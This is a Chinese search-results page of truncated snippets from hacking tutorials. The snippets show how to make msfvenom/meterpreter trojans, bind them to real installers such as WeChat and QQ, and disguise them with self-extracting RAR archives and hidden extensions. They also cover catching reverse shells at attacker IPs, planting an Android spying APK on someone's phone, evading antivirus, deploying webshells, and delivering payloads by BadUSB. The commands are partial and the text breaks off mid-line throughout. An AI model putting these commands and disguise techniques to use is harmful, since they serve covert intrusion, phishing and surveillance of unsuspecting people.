首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

msf木马程序

捆绑木马 这里使用的是Kali linux虚拟机 攻击机ip是192.168.0.108 靶机ip是192.168.177.134 生成木马文件 首先上传一个正常的安装包到kali里面 我这里下了一个...这里就不设置了,默认返回端口是4444 -f: 代表要捆绑的文件类型,这里是一个exe文件 -x:指定你要捆绑的文件的路径及文件名,这里我选择的是root/dy/里的PCQQ2020.exe -o:指定生成木马文件的路径及文件名...附:msfvenom介绍 msfvenom简介 msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,配合meterpreter在本地监听上线...msfvenom生成 生成payload,有有两个必须的选项:-p和-f 使用-p来指定要使用的payload。...RAR有一个自解压的功能 我们可以利用这一点来达到目的 有两个文件,一个是刚刚生成木马文件,一个是一个txt文档 全部选中,右击添加到压缩文件,注意这里一定要用rar压缩方式 ?

1.9K62
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    msf工具之木马程序制作以及伪装

    本文转自行云博客https://www.xy586.top 文章目录 捆绑木马 RAR自动解压 捆绑木马 使用msfvenom制作木马程序: #生成木马文件 msfvenom -p windows...将木马文件放入靶机中 ?...multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.232.138 set lport 4444 run 将木马程序点击执行...RAR自动解压 设置自动解压运行 设置rar自动解压格式让它在解压时运行恶意程序 模拟文本文档钓鱼 改良木马程序: 伪装:将网页代码和app进行绑定,然后压缩,使用WinRAR创建自解压格式...文本和图标选项中,选择加载我们刚刚生成的icon图标 ? 生成了我们伪装过后的木马程序 ? 同时可以将文件名称改成比较长的名字,在不选中文件的时候,文件名后面部分会被隐藏,达到隐藏后缀名的效果

    2.3K40

    【新手科普】盘点常见的Web后门

    不过网上很多的大马都加了后门,例如图中的这款从mumaasp.com这个网站下载的一款大马会将木马的地址和密码提交到http://www.mumaasp.com/xz/sx.asp这个网址 ?...中国菜刀和一句话木马想必是大家最熟悉的了,中国菜刀支持asp、php、asp.net和jsp等web编程语言,小巧的中国菜刀还自带了很多实用的功能。 例如虚拟终端 ?...使用方法也很简单,就是往目标web服务器上传相应的一句话木马asp一句话木马: php一句话木马: <?...msfvenom -p php/meterpreter/bind_tcp lhost=172.24.3.20 lport=4444 -o /root/msf.php 其中lhost为目标服务器的地址...成功后会生成一个仿真终端,可以使用load命令来加载模块,之后可以进行上传下载,连接数据库等操作。 只是不能设置密码是个硬伤。

    3.6K90

    msf生成的shellcode分析--走,组团分析shellcode呀

    作者丨selph 分析 MSF Windows/exec Shellcode 最近分析漏洞用到msf生成的样本进行测试,其中用到payload选项为Windows/exec cmd="calc.exe"...实验环境 • 虚拟机:Kali Linux 2022.1 x64 • 物理机:Windows 10 21H2 家庭版 • 软件:x86dbg,scdbg,windbg,010 Editor 生成shellcode...使用Kali Linux生成shellcode: ┌──(selph㉿kali)-[~/桌面/shellcode] └─$ msfvenom -p windows/exec cmd=calc.exe...-f raw -o shellcode.bin [-] No platform was selected, choosing Msf::Module::Platform::Windows from the...这里通过下面模板的表格去找对应的偏移即可辅助理解分析中用到的结构,跟着shellcode的反汇编中给出的偏移去找结构,本文中足够用了 具体操作这里就不再介绍,有需要深入了解可自行学习 分析shellcode 准备工作 把生成

    2.7K00

    红队专用免杀木马生成工具

    工具简介 一款红队专用免杀木马生成器,该工具可以通过红队人员提供的一段 shellcode 快速生成一个绕过所有杀软的可执行木马。...特点 基于Syscall进行免杀,且随机混淆,可过几乎所有杀软 内置go-strip对Go生成木马进行编译信息抹除与程序信息混淆 工具本体只有1个exe,搭配Go环境即可直接使用 工具使用 下载二进制文件...,并且在系统上安装Go语言环境,然后将shellcode保存到1个txt文件中,即可使用本工具生成免杀马。...Usage of CuiRi.exe:   -f string 通过shellcode生成免杀马   -manual 查看shellcode生成方法 支持的 shellcode 格式分为以下两种...shellcode (2) 生成免杀马 (3) 免杀效果

    1.3K20

    记一次内网渗透过程

    操作系统(Linux Windows) web容器(Apache Nginx Tomcat IIS ) 数据库 (mysql sqlserver access oracle) 脚本类型 (PHP jsp asp...转移cs,并添加监听 cs添加监听 从msf将session转移至cs 保留之前meterpreter会话bg,后面可能会用到 使用payload_inject模块 use exploit/windows...msf拿到的session到一定时间会自动离线,这里直接可以在cs中重新派生session,不需要再从头到尾来一遍。...拿下Win2016 生成木马,通过蚁剑上传 生成木马,通过蚁剑上传至10.0.20.99 在任意目录下执行命令,生成木马hacker.exe msfvenom -p windows/x64/meterpreter.../bind_tcp set rhost 10.0.20.99 set lport 8881 run 正向shell-cs拿下WIn2016 配置并启动tcp监听器,类型选Beacon Tcp 生成后门

    11810

    使用Kali生成木马入侵安卓手机

    android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk 这里的5555是设置的端口,也可以自己更改,显示这个说明已经生成成功...也就是你的kali的ip地址 还有LPORT端口,刚才设置的为5555,也需要更改一下(刚才直接设置为4444也是可以的) 1.set LHOST 192.168.1.114 //这里的地址设置成我们刚才生成木马的...IP地址 2.set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口 3.exploit //开始执行漏洞 开始监听,等待手机上线 接下来就要发挥你的聪明才智将这个apk...装在你想监控的手机上了 红色框出的地方就说明手机上线了然后可以输入sysinfo 查看手机信息 开启摄像头之后,然后会生成两个文件,双击就可以打开了 webcam_list 查看手机有多少个摄像头

    7.1K33

    木马免杀方式_木马入侵的常见方法

    1、裸奔马的尝试 意为不做任何免杀处理的木马 1、使用msf的msfvenom生成木马文件,生成一个裸奔马,命名为 weixin.exe吧 命令: msfvenom -p windows/meterpreter...2、MSF编码 在metasploit框架下免杀的方式之一是msf编码器,功能是使用msf编码器对我们制作的木马进行重新编码,生成一个二进制文件,这个文件运行后,msf编码器会将原始程序解码到内存中并执行...(也有对裸奔马进行shikata_ga_nai编码饶AV的方法,但是shikata_ga_nai编码技术多态,每次生成的攻击载荷文件都不一样,有时生成的文件会被查杀,有时不会,所以结合以上思路,生成一个捆绑木马...,并进行shikata_ga_nai编码) 把微信安装包放在/root文件夹下 3、使用msfvenom生成一个Windows环境下的木马,并捆绑到WeChatSetup.exe上生成WeChatSetup1...-i /指定对目标进行编码的次数,多次编码理论上有助于免杀的实现 -f /指定msf编码器输出程序的格式 -0 /指定处理完毕后的文件输出路径 4、把生成的文件放在kali中的apache服务对应的文件夹下

    1.8K40

    利用BadUSB针对目标优雅的渗透

    搭建服务器、并生成木马 搭建服务器的目的是为了让受害者远程下载木马文件。(服务器的搭建这里不是重点,就不讲了) 利用msf生成木马文件: ?...LHOST为攻击者IP,生成木马文件名字为shell.exe,将这个木马文件放置于web服务器上,以便受害者下载(在不知觉的情况下下载)。 开启监听, 在攻击者主机上运行MSF,并开启监听: ?...上图中攻击代码中的ip地址、木马文件修改为自己的ip地址和自己生成木马文件。...利用MSF的代理模块,配置MSF的代理模块和本地代理,就可以实现那,具体如下. 我们先配置MSF的代理模块: ?...2.当badusb运行时,发现攻击端的MSF没有反弹。 此时应该考虑两个问题:问题一:木马是否已经下载;问题二:当代码下载后,并运行了木马,但攻击端的MSF仍没有反弹。

    2.3K50
    领券